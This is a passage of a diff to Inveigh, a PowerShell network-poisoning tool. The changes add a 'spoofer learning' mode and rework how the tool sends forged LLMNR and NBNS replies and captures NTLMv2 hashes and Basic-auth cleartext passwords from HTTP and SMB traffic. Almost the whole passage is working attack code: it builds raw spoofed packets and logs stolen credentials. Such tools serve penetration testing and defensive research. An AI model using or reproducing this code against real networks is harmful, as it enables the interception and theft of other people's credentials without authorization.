$inveigh.NTLMv2_out_file) } - if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) + if($inveigh.NTLMv2_username_list -notcontains ("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) { - $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") + $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") } } } - if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) + if($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) { - $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString) + $inveigh.IP_capture_list.Add($HTTP_source_IP) } $inveigh.response.StatusCode = 200 $NTLM_auth = $true - $NTLM_challenge = '' + $NTLM_challenge = "" $HTTP_raw_url_output = $true } @@ -1226,13 +1237,13 @@ $HTTP_scriptblock = elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code { $inveigh.response.StatusCode = 200 - $Basic_auth = $true + $basic_auth = $true $authentication_header = $authentication_header -replace 'Basic ','' $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)]) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")]) $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.Address) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP") if($inveigh.file_output) { @@ -1241,38 +1252,38 @@ $HTTP_scriptblock = } - if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth) + if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $basic_auth) { - if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))) + if($HTTPDir -and $HTTPDefaultEXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl))) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE)) } - elseif($inveigh.HTTP_directory) + elseif($HTTPDir) { - if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') + if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) } - elseif($inveigh.HTTP_default_file -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file))) + elseif($HTTPDefaultFile -and $inveigh.request.RawUrl -eq '/' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile))) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile)) } - elseif($inveigh.WPAD_response -and $inveigh.request.RawUrl -match '/wpad.dat') + elseif($WPADResponse -and $inveigh.request.RawUrl -match '/wpad.dat') { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.WPAD_response) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse) } else { - if(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + if(Test-Path (Join-Path $HTTPDir $inveigh.request.RawUrl)) { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) + [Byte[]]$HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $inveigh.request.RawUrl)) } else { - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.HTTP_response) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse) } } @@ -1283,23 +1294,23 @@ $HTTP_scriptblock = if($inveigh.request.RawUrl -match '/wpad.dat') { - $inveigh.message = $inveigh.WPAD_response + $inveigh.message = $WPADResponse } - elseif($inveigh.HTTP_response) + elseif($HTTPResponse) { - $inveigh.message = $inveigh.HTTP_response + $inveigh.message = $HTTPResponse } else { $inveigh.message = $null } - [Byte[]] $HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) + [Byte[]]$HTTP_buffer = [System.Text.Encoding]::UTF8.GetBytes($inveigh.message) } } else { - [Byte[]] $HTTP_buffer = $null + [Byte[]]$HTTP_buffer = $null } if(($HTTPAuth -eq 'NTLM' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $inveigh.request.RawUrl -match '/wpad.dat') -and !$NTLM_auth) @@ -1328,7 +1339,7 @@ $HTTP_scriptblock = # Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer $sniffer_scriptblock = { - param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$RunTime,$LLMNRTTL,$NBNSTTL) + param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval,$RunTime,$LLMNRTTL,$NBNSTTL) $byte_in = New-Object System.Byte[] 4 $byte_out = New-Object System.Byte[] 4 @@ -1347,10 +1358,18 @@ $sniffer_scriptblock = [Array]::Reverse($LLMNR_TTL_bytes) $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) [Array]::Reverse($NBNS_TTL_bytes) + $LLMNR_learning_log = New-Object System.Collections.Generic.List[string] + $NBNS_learning_log = New-Object System.Collections.Generic.List[string] + + if($SpooferLearningDelay) + { + $spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay + $spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } if($RunTime) { - $sniffer_timeout = new-timespan -Minutes $RunTime + $sniffer_timeout = New-TimeSpan -Minutes $RunTime $sniffer_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() } @@ -1397,7 +1416,16 @@ $sniffer_scriptblock = { if($SMB -eq 'Y') { - SMBNTLMResponse $payload_bytes + + if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port) + { + SMBNTLMResponse $payload_bytes + } + + $client_IP = "" + $client_port = "" + $NTLM_challenge = "" + } } @@ -1406,7 +1434,16 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { - SMBNTLMResponse $payload_bytes + + if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port) + { + SMBNTLMResponse $payload_bytes + } + + $client_IP = "" + $client_port = "" + $NTLM_challenge = "" + } } @@ -1422,6 +1459,8 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { + $client_IP = $destination_IP + $client_port = $destination_port $NTLM_challenge = SMBNTLMChallenge $payload_bytes } @@ -1432,6 +1471,8 @@ $sniffer_scriptblock = if($SMB -eq 'Y') { + $client_IP = $destination_IP + $client_port = $destination_port $NTLM_challenge = SMBNTLMChallenge $payload_bytes } @@ -1443,7 +1484,7 @@ $sniffer_scriptblock = 17 { # UDP - $source_port = $binary_reader.ReadBytes(2) + $source_port = $binary_reader.ReadBytes(2) $endpoint_source_port = DataToUInt16 ($source_port) $destination_port = DataToUInt16 $binary_reader.ReadBytes(2) $UDP_length = $binary_reader.ReadBytes(2) @@ -1452,21 +1493,20 @@ $sniffer_scriptblock = $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4) # Incoming packets - switch ($destination_port) + switch($destination_port) { 137 # NBNS { - if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP) + if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01') { - $UDP_length[0] += 16 + $UDP_length[0] += 12 $NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] + - $NBNS_TTL_bytes + - 0x00,0x06,0x00,0x00 + - ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + - 0x00,0x00,0x00,0x00 + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() $NBNS_response_packet = 0x00,0x89 + $source_port[1,0] + @@ -1476,9 +1516,6 @@ $sniffer_scriptblock = 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + $NBNS_response_data - $send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44]) switch ($NBNS_query_type) @@ -1506,17 +1543,17 @@ $sniffer_scriptblock = '42-4D' { - $NBNS_query_type = '1C' + $NBNS_query_type = '1C' } '42-4E' { - $NBNS_query_type = '1D' + $NBNS_query_type = '1D' } '42-4F' { - $NBNS_query_type = '1E' + $NBNS_query_type = '1E' } } @@ -1547,54 +1584,154 @@ $sniffer_scriptblock = } until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + $NBNS_request_ignore = $false + if($NBNS -eq 'Y') { - if($NBNSTypes -contains $NBNS_query_type) + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP) { - - if ((!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) - { - $send_socket.sendTo($NBNS_response_packet,$destination_point) - $send_socket.Close() - $NBNS_response_message = "- spoofed response has been sent" - } - else + + if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"}))) { + $NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19) - if($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) - { - $NBNS_response_message = "- $NBNS_query_string is not on reply list" - } - elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval)) { - $NBNS_response_message = "- $NBNS_query_string is on ignore list" - } - elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) - { - $NBNS_response_message = "- $source_IP is not on reply list" - } - elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) - { - $NBNS_response_message = "- $source_IP is on ignore list" + $NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"})) + $NBNS_learning_send = $true } else { - $NBNS_response_message = "- not spoofed due to previous capture" + $NBNS_learning_send = $false } - + + } + else + { + $NBNS_learning_send = $true } + if($NBNS_learning_send) + { + $NBNS_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $NBNS_transaction_ID_bytes = $NBNS_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_transaction_ID = $NBNS_transaction_ID -replace " ","-" + $NBNS_UDP_client = new-Object System.Net.Sockets.UdpClient 137 + $NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $NBNS_request_packet = $NBNS_transaction_ID_bytes + + 0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 + + $NBNS_hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137) + $NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string") + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString) + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)]) + } + + } + + if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and ( + $NBNSTypes -contains $NBNS_query_type)) + { + + if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp) + $NBNS_send_socket.SendBufferSize = 1024 + $NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port) + $NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point) + $NBNS_send_socket.Close() + $NBNS_response_message = "- response sent" + } + else + { + $NBNS_request_ignore = $true + } + } else { - $NBNS_response_message = "- spoof not sent due to disabled type" + + if($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_request_ignore = $true + } + elseif($NBNSTypes -notcontains $NBNS_query_type) + { + $NBNS_response_message = "- disabled NBNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" + } + elseif($NBNS_query_string.Trim() -eq '*') + { + $NBNS_response_message = "- NBSTAT request" + } + elseif($inveigh.valid_host_list -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is a valid host" + } + elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString) + { + $NBNS_response_message = "- previous capture from $source_IP" + } + elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay) + { + $NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts" + } + elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $NBNS_response_message = "- request is local" + } + else + { + $NBNS_response_message = "- something went wrong" + } + } } - $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00') + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + } + elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + [Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes + $NBNS_response_IP = $NBNS_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $NBNS_query_string) + { + $inveigh.valid_host_list.Add($NBNS_query_string) + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS response $NBNS_response_IP for $NBNS_query_string received from $source_IP - $NBNS_query_string added to valid host list")]) + } + } } } @@ -1612,29 +1749,100 @@ $sniffer_scriptblock = ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() $LLMNR_response_packet = 0x14,0xeb + - $source_port[1,0] + - $UDP_length[1,0] + - 0x00,0x00 + - $payload_bytes[0,1] + - 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + - $LLMNR_response_data + $source_port[1,0] + + $UDP_length[1,0] + + 0x00,0x00 + + $payload_bytes[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_response_data $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)]) $LLMNR_query = $LLMNR_query -replace "-00","" - $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + + if($LLMNR_query.Length -eq 2) + { + $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16) + $LLMNR_query_string = New-Object System.String($LLMNR_query) + } + else + { + $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + } + + $LLMNR_request_ignore = $false if($LLMNR -eq 'Y') { - if((!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString)) + if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -contains $LLMNR_query_string -and $source_IP -ne $IP) { - $send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) - $send_socket.SendBufferSize = 1024 - $destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) - $send_socket.SendTo($LLMNR_response_packet,$destination_point) - $send_socket.Close() - $LLMNR_response_message = "- spoofed response has been sent" + + if(($LLMNR_learning_log.Exists({param($s) $s -like "20* $LLMNR_query_string"}))) + { + $LLMNR_learning_queue_time = [DateTime]$LLMNR_learning_log.Find({param($s) $s -like "20* $LLMNR_query_string"}).SubString(0,19) + + if((Get-Date) -ge $LLMNR_learning_queue_time.AddMinutes($SpooferLearningInterval)) + { + $LLMNR_learning_log.RemoveAt($LLMNR_learning_log.FindIndex({param($s) $s -like "20* $LLMNR_query_string"})) + $LLMNR_learning_send = $true + } + else + { + $LLMNR_learning_send = $false + } + + } + else + { + $LLMNR_learning_send = $true + } + + if($LLMNR_learning_send) + { + $LLMNR_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) + $LLMNR_transaction_ID_bytes = $LLMNR_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_transaction_ID = $LLMNR_transaction_ID -replace " ","-" + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient + $LLMNR_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)] + + $LLMNR_request_packet = $LLMNR_transaction_ID_bytes + + 0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00 + + ($LLMNR_hostname_bytes.Length - 1) + + $LLMNR_hostname_bytes + + 0x00,0x01,0x00,0x01 + + $LLMNR_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]"224.0.0.252",5355) + $LLMNR_UDP_client.Connect($LLMNR_learning_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_request_packet,$LLMNR_request_packet.Length) + $LLMNR_UDP_client_port = ($LLMNR_UDP_client.Client.LocalEndPoint).Port + $LLMNR_UDP_client.Close() + $LLMNR_learning_log.Add("$(Get-Date -format 's') $LLMNR_transaction_ID $LLMNR_query_string") + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string sent to 224.0.0.252")]) + } + + } + + if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and ( + !$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ( + $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay))) + { + + if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_send_socket = New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp ) + $LLMNR_send_socket.SendBufferSize = 1024 + $LLMNR_destination_point = New-Object System.Net.IPEndpoint($source_IP,$endpoint_source_port) + $LLMNR_send_socket.SendTo($LLMNR_response_packet,$LLMNR_destination_point) + $LLMNR_send_socket.Close() + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR_request_ignore = $true + } } else { @@ -1655,21 +1863,77 @@ $sniffer_scriptblock = { $LLMNR_response_message = "- $source_IP is on ignore list" } + elseif($inveigh.valid_host_list -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is a valid host" + } + elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString) + { + $LLMNR_response_message = "- previous capture from $source_IP" + } + elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay) + { + $LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts" + } else { - $LLMNR_response_message = "- not spoofed due to previous capture" + $LLMNR_response_message = "- something went wrong" } } } - $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + if(!$LLMNR_request_ignore) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + } + + } + } + + } + + switch($endpoint_source_port) + { + + 5355 # LLMNR Response + { + + if($SpooferLearning -eq 'Y' -and $LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"})) + { + $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes[12] + 13)]) + $LLMNR_query = $LLMNR_query -replace "-00","" + + if($LLMNR_query.Length -eq 2) + { + $LLMNR_query = [Char][System.Convert]::ToInt16($LLMNR_query,16) + $LLMNR_query_string = New-Object System.String($LLMNR_query) + } + else + { + $LLMNR_query = $LLMNR_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $LLMNR_query_string = New-Object System.String($LLMNR_query,0,$LLMNR_query.Length) + } + + [Byte[]]$LLMNR_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)] + $LLMNR_response_IP = [System.Net.IPAddress]$LLMNR_response_IP_bytes + $LLMNR_response_IP = $LLMNR_response_IP.IPAddressToString + + if($inveigh.valid_host_list -notcontains $LLMNR_query_string) + { + $inveigh.valid_host_list.Add($LLMNR_query_string) + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR response $LLMNR_response_IP for $LLMNR_query_string received from $source_IP - $LLMNR_query_string added to valid host list")]) + } + } + } } + } } @@ -1686,14 +1950,6 @@ $sniffer_scriptblock = $inveigh.HTTP_listener.Close() } - if($inveigh.relay_running) - { - $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") - 